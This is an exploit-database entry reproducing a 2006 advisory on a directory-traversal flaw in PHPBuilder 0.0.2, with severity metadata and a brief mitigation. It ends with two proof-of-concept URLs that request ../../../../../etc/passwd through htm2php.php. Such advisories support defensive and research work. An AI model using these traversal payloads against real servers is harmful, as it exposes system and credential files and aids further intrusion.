header-logo
Suggest Exploit
vendor:
PHPBuilder
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: PHPBuilder
Affected Version From: 0.0.2
Affected Version To: 0.0.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PHPBuilder Directory Traversal Vulnerability

PHPBuilder is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. A remote attacker could exploit this vulnerability to reveal the contents of files that contain sensitive information that could aid in further attacks against the affected computer.

Mitigation:

Input validation should be used to prevent directory traversal attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21703/info

PHPBuilder is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

A remote attacker could exploit this vulnerability to reveal the contents of files that contain sensitive information that could aid in further attacks against the affected computer.

PHPBuilder 0.0.2 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/[Path]/lib/htm2php.php?filename=../../../../../etc/passwd
http://www.example.com/[Path]/sitetools/htm2php.php?filename=../../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR